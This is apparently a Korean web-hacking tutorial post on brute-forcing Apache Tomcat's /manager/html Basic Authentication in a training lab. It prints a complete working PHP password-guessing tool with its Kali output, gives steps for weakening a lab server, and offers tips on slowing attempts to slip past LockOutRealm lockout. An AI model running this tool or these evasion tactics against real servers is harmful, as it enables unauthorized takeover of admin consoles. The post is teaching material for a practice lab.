Apache Tomcat /manager/html 무작위대입공격 도구 작성

[HTTP 요청]
GET http://192.168.106.160:8080/manager/html HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Authorization: Basic VVNFUjpQQVNT
Cookie: JSESSIONID=606B57450E8D8E27F0C1A7DB744F9AF8
Host: 192.168.106.160:8080

root@kali:~# base64 -d <<< VVNFUjpQQVNT
USER:PASSroot@kali:~#

통신과정에서 HTTP 헤더에 Base64로 인코딩된 계정:비번 정보를 보낸다.

[HTTP 응답 헤더]
HTTP/1.1 401 Unauthorized
Server: Apache-Coyote/1.1
Cache-Control: private
Expires: Thu, 01 Jan 1970 09:00:00 KST
WWW-Authenticate: Basic realm="Tomcat Manager Application"
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 21 Jul 2017 06:55:24 GMT

ID는 "USER", PW는 "PASS"로 로그인했을 때 401 권한인증 오류가 위와 같이 서버로부터 전송된다.

HTTP 요청 헤더에서 "Authorization: Basic Base64('USER:PASS')"를 사용하고 HTTP 응답 헤더에 계정정보가 맞지 않을 경우에는 "401 Unauthorized"라는 문자열이 반환된다는 두 가지 조건을 이용하여 PHP로 간단하게 다음과 같은 도구를 작성하였다.

[HttpBasicAuthBruter.txt 내용]
<?php
/* Attacking tool for HTTP Basic Authentication */
if ($argc != 4) {
	echo "Usage: php $argv[0] user_list.txt pass_list.txt URL_to_attack\n";
	exit(-1);
}
$user_list = file($argv[1], FILE_IGNORE_NEW_LINES);
if ($user_list == false) {
	echo "Can't read ID list file, $argv[1].\n";
	exit(-1);
}
$pass_list = file($argv[2], FILE_IGNORE_NEW_LINES);
if ($pass_list == false) {
	echo "Can't read PW list file, $argv[2].\n";
	exit(-1);
}
$target_url = $argv[3];

/*
print_r($user_list);
print_r($pass_list);
*/

foreach ($user_list as $user) {
    foreach ($pass_list as $pass) {
	unset($basic_header);
	$basic_header[] = "Authorization: Basic ".base64_encode($user.':'.$pass);

        $c = curl_init($target_url);
        curl_setopt($c, CURLOPT_HEADER, true);
        curl_setopt($c, CURLOPT_HTTPHEADER, $basic_header);
        curl_setopt($c, CURLOPT_RETURNTRANSFER, true);
	curl_setopt($c, CURLINFO_HEADER_OUT, true); // for request tracking
        $page = curl_exec($c);
	$request_header =  curl_getinfo($c, CURLINFO_HEADER_OUT ); // request headers
        curl_close($c);

/*
echo "================================================================\n";
echo $request_header;
echo "================================================================\n";
echo $page;
echo "================================================================\n";
*/
        if (strstr($page, '401 Unauthorized')) continue;
        else {
            echo $user.'/'.$pass." 로그인 성공!\n";
            // exit(0);
        }
    }
}
?>

위의 PHP 스크립트를 실행하기 위해서는 php-curl을 설치하여야 한다. (여기서는 이미 설치되어 있다는 정보가 출력된다.) 실행하는 방법은 아래와 같다.

root@kali:~# apt-get install php-curl
패키지 목록을 읽는 중입니다... 완료
의존성 트리를 만드는 중입니다       
상태 정보를 읽는 중입니다... 완료
php-curl is already the newest version (1:7.0+52).
0개 업그레이드, 0개 새로 설치, 0개 제거 및 0개 업그레이드 안 함.
root@kali:~# php HttpBasicAuthBruter.txt
Usage: php HttpBasicAuthBruter.txt user_list.txt pass_list.txt URL_to_attack
root@kali:~# php HttpBasicAuthBruter.txt ~/weakuser.txt ~/weakpass.txt http://192.168.106.160:8080/manager/html
admin/s3cret 로그인 성공!
root@kali:~#

취약한 비밀번호 목록은 weakuser.txt와 weakpass.txt를 사용하였다. 어느 정도 시간이 흐르면 admin:s3cret로 로그인에 성공하는 것을 볼 수 있다.

Apache Tomcat 관리자로 로그인한 모습: WAR 형태로 웹 애플리케이션 등록 가능

[참고] 훈련장 구성할 때의 요건 1

      <Realm className="org.apache.catalina.realm.LockOutRealm" failureCount="20000" >

Apache Tomcat의 LockOutRealm 방어 기법은 무작위대입공격을 차단한다. 톰캣 디렉토리의 conf/server.xml 파일에서 간단하게 위와 같이 failureCount를 설정하여 비활성화시킨 것과 같은 효과를 볼 수 있다. Tomcat을 기본으로 설치한 경우에는 /etc/tomcat7/ 경로에서 해당 파일을 찾을 수 있다.

[참고] 훈련장 구성할 때의 요건 2

  <role rolename="manager-gui"/>
  <role rolename="admin-gui"/>
  <user username="admin" password="s3cret" roles="manager-gui,admin-gui"/>

톰캣 디렉토리의 conf/tomcat-users.xml 파일에서 위와 같이 관리자 ID/PW를 취약하게 설정한다. Tomcat을 기본으로 설치한 경우에는 /etc/tomcat7/ 경로에서 해당 파일을 찾을 수 있다.

[참고] LockOutRealm을 우회하여 공격하는 실제 자동화 공격 방법

서버 하나에 대해서 하루에 수십~수백 번 정도만 무작위 대입 공격을 수행한다.
해커 입장에서는 수십~수백만 개의 공격 대상이 있으므로 이 정도로 공격해도 충분한 좀비를 확보할 수 있을 것이다.
10여개 내외의 ID/PW 목록만을 사용하여 공격한다.
성공 가능성은 줄어들지만 위의 방법에 비해서는 효율이 매우 높다.
다음은 실제 기계적인 공격이 성공한 무작위대입공격의 로그를 칼리리눅스에서 살펴본 것이다. 단지 7번의 시도만에 /manager/html에 tomcat 계정으로 로그인에 성공한 것을 관찰할 수 있다.

root@kali:~# grep 211.144.157.50 localhost_access_log.2017-06-17.txt | head -7
211.144.157.50 - - [17/Jun/2017:12:42:35 +0900] "GET /manager/html HTTP/1.1" 401 2538
211.144.157.50 - - [17/Jun/2017:12:42:36 +0900] "GET /manager/html HTTP/1.1" 401 2538
211.144.157.50 - - [17/Jun/2017:12:42:37 +0900] "GET /manager/html HTTP/1.1" 401 2538
211.144.157.50 - - [17/Jun/2017:12:42:38 +0900] "GET /manager/html HTTP/1.1" 401 2538
211.144.157.50 - - [17/Jun/2017:12:42:40 +0900] "GET /manager/html HTTP/1.1" 401 2538
211.144.157.50 - - [17/Jun/2017:12:42:41 +0900] "GET /manager/html HTTP/1.1" 401 2538
211.144.157.50 - tomcat [17/Jun/2017:12:42:42 +0900] "GET /manager/html HTTP/1.1" 200 19775
root@kali:~#

[처음 작성한 날: 2017.07.21] [마지막으로 고친 날: 2017.07.23]

> 이 글을 목록없이 인쇄하기 편하게 보기

< 이전 글 : [과제] WH-COOKIE-02 웹해킹훈련장: 쿠키 오용 취약점 (2017.08.09)

> 다음 글 : 칼리 리눅스를 이용한 From SQL Injection to Shell 공략 (2017.04.04)

이 저작물은 크리에이티브 커먼즈 저작자표시 4.0 국제 라이선스에 따라 이용할 수 있습니다.
잘못된 내용, 오탈자 및 기타 문의사항은 j1n5uk{at}daum.net으로 연락주시기 바랍니다.
문서의 시작으로 컴퓨터 깨알지식 웹핵 누리집 대문